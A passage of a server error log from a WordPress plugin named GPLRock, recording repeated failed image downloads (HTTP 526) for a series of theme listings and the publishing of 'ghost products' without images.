03:03:03 UTC] GPLRock: Image download failed for product alliance-intranet-extranet-buddypress-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 03:03:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alliance--intranet--extranet-buddypress-wordpress-theme-29564.webp for product alliance-intranet-extranet-buddypress-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 03:03:05 UTC] GPLRock WARNING: Image download failed for product alliance-intranet-extranet-buddypress-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/alliance--intranet--extranet-buddypress-wordpress-theme-29564.webp [04-Apr-2026 03:03:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: alliance-intranet-extranet-buddypress-wordpress-theme [04-Apr-2026 06:06:25 UTC] GPLRock: Image download failed for product tuber-video-podcast-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:27 UTC] GPLRock: Image download failed for product tuber-video-podcast-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tuber---video--podcast-wordpress-theme-28565.webp for product tuber-video-podcast-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:06:29 UTC] GPLRock: Image download failed for product tuber-video-podcast-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:31 UTC] GPLRock: Image download failed for product tuber-video-podcast-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tuber---video--podcast-wordpress-theme-28565.webp for product tuber-video-podcast-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:06:33 UTC] GPLRock WARNING: Image download failed for product tuber-video-podcast-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tuber---video--podcast-wordpress-theme-28565.webp [04-Apr-2026 06:06:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tuber-video-podcast-wordpress-theme [04-Apr-2026 06:06:33 UTC] GPLRock: Image download failed for product coachfocus-coaching-online-courses-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:36 UTC] GPLRock: Image download failed for product coachfocus-coaching-online-courses-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coachfocus---coaching--online-courses-wordpress-theme-21727.webp for product coachfocus-coaching-online-courses-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:06:38 UTC] GPLRock: Image download failed for product coachfocus-coaching-online-courses-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:40 UTC] GPLRock: Image download failed for product coachfocus-coaching-online-courses-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coachfocus---coaching--online-courses-wordpress-theme-21727.webp for product coachfocus-coaching-online-courses-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:06:42 UTC] GPLRock WARNING: Image download failed for product coachfocus-coaching-online-courses-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/coachfocus---coaching--online-courses-wordpress-theme-21727.webp [04-Apr-2026 06:06:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: coachfocus-coaching-online-courses-wordpress-theme [04-Apr-2026 06:06:42 UTC] GPLRock: Image download failed for product wealth-multi-purpose-landing-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:44 UTC] GPLRock: Image download failed for product wealth-multi-purpose-landing-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wealth--multi-purpose-landing-page-wordpress-theme-7202.webp for product wealth-multi-purpose-landing-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:06:46 UTC] GPLRock: Image download failed for product wealth-multi-purpose-landing-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:48 UTC] GPLRock: Image download failed for product wealth-multi-purpose-landing-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wealth--multi-purpose-landing-page-wordpress-theme-7202.webp for product wealth-multi-purpose-landing-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:06:51 UTC] GPLRock WARNING: Image download failed for product wealth-multi-purpose-landing-page-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wealth--multi-purpose-landing-page-wordpress-theme-7202.webp [04-Apr-2026 06:06:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wealth-multi-purpose-landing-page-wordpress-theme [04-Apr-2026 06:06:51 UTC] GPLRock: Image download failed for product crework-coworking-and-creative-space-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:53 UTC] GPLRock: Image download failed for product crework-coworking-and-creative-space-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crework--coworking-and-creative-space-wordpress-theme-32287.webp for product crework-coworking-and-creative-space-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:06:55 UTC] GPLRock: Image download failed for product crework-coworking-and-creative-space-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:57 UTC] GPLRock: Image download failed for product crework-coworking-and-creative-space-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:06:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crework--coworking-and-creative-space-wordpress-theme-32287.webp for product crework-coworking-and-creative-space-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:06:59 UTC] GPLRock WARNING: Image download failed for product crework-coworking-and-creative-space-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/crework--coworking-and-creative-space-wordpress-theme-32287.webp [04-Apr-2026 06:06:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: crework-coworking-and-creative-space-wordpress-theme [04-Apr-2026 06:06:59 UTC] GPLRock: Image download failed for product behold-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:02 UTC] GPLRock: Image download failed for product behold-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/behold---personal-blog-wordpress-theme-3192.webp for product behold-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:07:04 UTC] GPLRock: Image download failed for product behold-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:06 UTC] GPLRock: Image download failed for product behold-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/behold---personal-blog-wordpress-theme-3192.webp for product behold-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:07:08 UTC] GPLRock WARNING: Image download failed for product behold-personal-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/behold---personal-blog-wordpress-theme-3192.webp [04-Apr-2026 06:07:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: behold-personal-blog-wordpress-theme [04-Apr-2026 06:07:08 UTC] GPLRock: Image download failed for product boulder-multi-purpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:10 UTC] GPLRock: Image download failed for product boulder-multi-purpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/boulder---multi-purpose-woocommerce-theme-10967.webp for product boulder-multi-purpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:07:12 UTC] GPLRock: Image download failed for product boulder-multi-purpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:15 UTC] GPLRock: Image download failed for product boulder-multi-purpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/boulder---multi-purpose-woocommerce-theme-10967.webp for product boulder-multi-purpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:07:17 UTC] GPLRock WARNING: Image download failed for product boulder-multi-purpose-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/boulder---multi-purpose-woocommerce-theme-10967.webp [04-Apr-2026 06:07:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: boulder-multi-purpose-woocommerce-theme [04-Apr-2026 06:07:17 UTC] GPLRock: Image download failed for product playo-directory-listing-community-woocommerce-vendor-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:19 UTC] GPLRock: Image download failed for product playo-directory-listing-community-woocommerce-vendor-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/playo---directory--listing-community-woocommerce-vendor-multi-purpose-wordpress--19985.webp for product playo-directory-listing-community-woocommerce-vendor-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:07:21 UTC] GPLRock: Image download failed for product playo-directory-listing-community-woocommerce-vendor-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:23 UTC] GPLRock: Image download failed for product playo-directory-listing-community-woocommerce-vendor-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/playo---directory--listing-community-woocommerce-vendor-multi-purpose-wordpress--19985.webp for product playo-directory-listing-community-woocommerce-vendor-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:07:25 UTC] GPLRock WARNING: Image download failed for product playo-directory-listing-community-woocommerce-vendor-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/playo---directory--listing-community-woocommerce-vendor-multi-purpose-wordpress--19985.webp [04-Apr-2026 06:07:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: playo-directory-listing-community-woocommerce-vendor-multi-purpose-wordpress-theme [04-Apr-2026 06:07:25 UTC] GPLRock: Image downloaded successfully for product auditing-accounting-consultant-finance-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f5c3f5d.webp [04-Apr-2026 06:07:25 UTC] GPLRock: Using pre-downloaded image for product auditing-accounting-consultant-finance-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f5c3f5d.webp [04-Apr-2026 06:07:25 UTC] GPLRock: Ghost product published with image - Product ID: auditing-accounting-consultant-finance-wordpress-theme [04-Apr-2026 06:07:26 UTC] GPLRock: Image download failed for product xoxo-personal-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:28 UTC] GPLRock: Image download failed for product xoxo-personal-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xoxo---personal-blog--magazine-wordpress-theme-19307.webp for product xoxo-personal-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:07:30 UTC] GPLRock: Image download failed for product xoxo-personal-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:32 UTC] GPLRock: Image download failed for product xoxo-personal-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xoxo---personal-blog--magazine-wordpress-theme-19307.webp for product xoxo-personal-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:07:34 UTC] GPLRock WARNING: Image download failed for product xoxo-personal-blog-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/xoxo---personal-blog--magazine-wordpress-theme-19307.webp [04-Apr-2026 06:07:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: xoxo-personal-blog-magazine-wordpress-theme [04-Apr-2026 06:07:34 UTC] GPLRock: Image download failed for product mediafoundry-creative-production-studio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:36 UTC] GPLRock: Image download failed for product mediafoundry-creative-production-studio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mediafoundry---creative-production-studio-theme-33229.webp for product mediafoundry-creative-production-studio-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:07:39 UTC] GPLRock: Image download failed for product mediafoundry-creative-production-studio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:41 UTC] GPLRock: Image download failed for product mediafoundry-creative-production-studio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:07:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mediafoundry---creative-production-studio-theme-33229.webp for product mediafoundry-creative-production-studio-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:07:43 UTC] GPLRock WARNING: Image download failed for product mediafoundry-creative-production-studio-theme. URL: https://meldwp.com/wp-content/uploads/mediafoundry---creative-production-studio-theme-33229.webp [04-Apr-2026 06:07:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mediafoundry-creative-production-studio-theme [04-Apr-2026 06:20:33 UTC] GPLRock: Image download failed for product akcel-crowdfunding-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:20:35 UTC] GPLRock: Image download failed for product akcel-crowdfunding-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:20:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/akcel---crowdfunding-charity-wordpress-theme-3304.webp for product akcel-crowdfunding-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:20:37 UTC] GPLRock: Image download failed for product akcel-crowdfunding-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:20:39 UTC] GPLRock: Image download failed for product akcel-crowdfunding-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:20:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/akcel---crowdfunding-charity-wordpress-theme-3304.webp for product akcel-crowdfunding-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:20:41 UTC] GPLRock WARNING: Image download failed for product akcel-crowdfunding-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/akcel---crowdfunding-charity-wordpress-theme-3304.webp [04-Apr-2026 06:20:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: akcel-crowdfunding-charity-wordpress-theme [04-Apr-2026 06:20:41 UTC] GPLRock: Image download failed for product aaraa-fashion-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:20:43 UTC] GPLRock: Image download failed for product aaraa-fashion-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:20:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aaraa---fashion-shop-wordpress-theme-4024.webp for product aaraa-fashion-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:20:46 UTC] GPLRock: Image download failed for product aaraa-fashion-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:20:48 UTC] GPLRock: Image download failed for product aaraa-fashion-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:20:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aaraa---fashion-shop-wordpress-theme-4024.webp for product aaraa-fashion-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:20:50 UTC] GPLRock WARNING: Image download failed for product aaraa-fashion-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aaraa---fashion-shop-wordpress-theme-4024.webp [04-Apr-2026 06:20:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aaraa-fashion-shop-wordpress-theme [04-Apr-2026 06:20:50 UTC] GPLRock: Image download failed for product terminus-responsive-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:20:52 UTC] GPLRock: Image download failed for product terminus-responsive-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:20:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/terminus---responsive-multi-purpose-wordpress-theme-30999.webp for product terminus-responsive-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:20:55 UTC] GPLRock: Image download failed for product terminus-responsive-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:20:57 UTC] GPLRock: Image download failed for product terminus-responsive-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:20:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/terminus---responsive-multi-purpose-wordpress-theme-30999.webp for product terminus-responsive-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:20:59 UTC] GPLRock WARNING: Image download failed for product terminus-responsive-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/terminus---responsive-multi-purpose-wordpress-theme-30999.webp [04-Apr-2026 06:20:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: terminus-responsive-multi-purpose-wordpress-theme [04-Apr-2026 06:20:59 UTC] GPLRock: Image download failed for product experts-business-professional-theme-for-finance-firms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:01 UTC] GPLRock: Image download failed for product experts-business-professional-theme-for-finance-firms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/experts---business-professional-theme-for-finance-firms-6496.webp for product experts-business-professional-theme-for-finance-firms after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:21:03 UTC] GPLRock: Image download failed for product experts-business-professional-theme-for-finance-firms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:05 UTC] GPLRock: Image download failed for product experts-business-professional-theme-for-finance-firms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/experts---business-professional-theme-for-finance-firms-6496.webp for product experts-business-professional-theme-for-finance-firms after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:21:07 UTC] GPLRock WARNING: Image download failed for product experts-business-professional-theme-for-finance-firms. URL: https://meldwp.com/wp-content/uploads/experts---business-professional-theme-for-finance-firms-6496.webp [04-Apr-2026 06:21:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: experts-business-professional-theme-for-finance-firms [04-Apr-2026 06:21:08 UTC] GPLRock: Image download failed for product oment-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:10 UTC] GPLRock: Image download failed for product oment-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oment---event--conference-wordpress-theme-25360.webp for product oment-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:21:12 UTC] GPLRock: Image download failed for product oment-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:14 UTC] GPLRock: Image download failed for product oment-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oment---event--conference-wordpress-theme-25360.webp for product oment-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:21:16 UTC] GPLRock WARNING: Image download failed for product oment-event-conference-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/oment---event--conference-wordpress-theme-25360.webp [04-Apr-2026 06:21:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oment-event-conference-wordpress-theme [04-Apr-2026 06:21:16 UTC] GPLRock: Image download failed for product clix-creative-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:18 UTC] GPLRock: Image download failed for product clix-creative-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clix---creative-digital-agency-wordpress-theme-20497.webp for product clix-creative-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:21:21 UTC] GPLRock: Image download failed for product clix-creative-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:23 UTC] GPLRock: Image download failed for product clix-creative-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/clix---creative-digital-agency-wordpress-theme-20497.webp for product clix-creative-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:21:25 UTC] GPLRock WARNING: Image download failed for product clix-creative-digital-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/clix---creative-digital-agency-wordpress-theme-20497.webp [04-Apr-2026 06:21:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: clix-creative-digital-agency-wordpress-theme [04-Apr-2026 06:21:25 UTC] GPLRock: Image download failed for product pivot-multi-purpose-html-with-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:27 UTC] GPLRock: Image download failed for product pivot-multi-purpose-html-with-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pivot--multi-purpose-html-with-page-builder-31915.webp for product pivot-multi-purpose-html-with-page-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:21:29 UTC] GPLRock: Image download failed for product pivot-multi-purpose-html-with-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:31 UTC] GPLRock: Image download failed for product pivot-multi-purpose-html-with-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pivot--multi-purpose-html-with-page-builder-31915.webp for product pivot-multi-purpose-html-with-page-builder after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:21:33 UTC] GPLRock WARNING: Image download failed for product pivot-multi-purpose-html-with-page-builder. URL: https://meldwp.com/wp-content/uploads/pivot--multi-purpose-html-with-page-builder-31915.webp [04-Apr-2026 06:21:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pivot-multi-purpose-html-with-page-builder [04-Apr-2026 06:21:34 UTC] GPLRock: Image download failed for product thatix-food-recipes-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:36 UTC] GPLRock: Image download failed for product thatix-food-recipes-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/thatix---food-recipes-wordpress-theme-18859.webp for product thatix-food-recipes-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:21:38 UTC] GPLRock: Image download failed for product thatix-food-recipes-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:40 UTC] GPLRock: Image download failed for product thatix-food-recipes-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/thatix---food-recipes-wordpress-theme-18859.webp for product thatix-food-recipes-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:21:42 UTC] GPLRock WARNING: Image download failed for product thatix-food-recipes-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/thatix---food-recipes-wordpress-theme-18859.webp [04-Apr-2026 06:21:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: thatix-food-recipes-wordpress-theme [04-Apr-2026 06:21:42 UTC] GPLRock: Image download failed for product the-moon-creative-one-page-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:44 UTC] GPLRock: Image download failed for product the-moon-creative-one-page-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-moon---creative-one-page-multi-purpose-wordpress-theme-13123.webp for product the-moon-creative-one-page-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:21:47 UTC] GPLRock: Image download failed for product the-moon-creative-one-page-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:49 UTC] GPLRock: Image download failed for product the-moon-creative-one-page-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-moon---creative-one-page-multi-purpose-wordpress-theme-13123.webp for product the-moon-creative-one-page-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:21:51 UTC] GPLRock WARNING: Image download failed for product the-moon-creative-one-page-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/the-moon---creative-one-page-multi-purpose-wordpress-theme-13123.webp [04-Apr-2026 06:21:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-moon-creative-one-page-multi-purpose-wordpress-theme [04-Apr-2026 06:21:51 UTC] GPLRock: Image download failed for product spaville-spa-and-beauty-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:53 UTC] GPLRock: Image download failed for product spaville-spa-and-beauty-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spaville---spa-and-beauty-wordpress-theme-24581.webp for product spaville-spa-and-beauty-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:21:55 UTC] GPLRock: Image download failed for product spaville-spa-and-beauty-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:57 UTC] GPLRock: Image download failed for product spaville-spa-and-beauty-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:21:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spaville---spa-and-beauty-wordpress-theme-24581.webp for product spaville-spa-and-beauty-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 06:21:59 UTC] GPLRock WARNING: Image download failed for product spaville-spa-and-beauty-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/spaville---spa-and-beauty-wordpress-theme-24581.webp [04-Apr-2026 06:21:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: spaville-spa-and-beauty-wordpress-theme [04-Apr-2026 06:23:32 UTC] GPLRock: Image download failed for product agrios-agriculture-farming-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 06:23:34 UTC] GPLRock: Image download failed for product 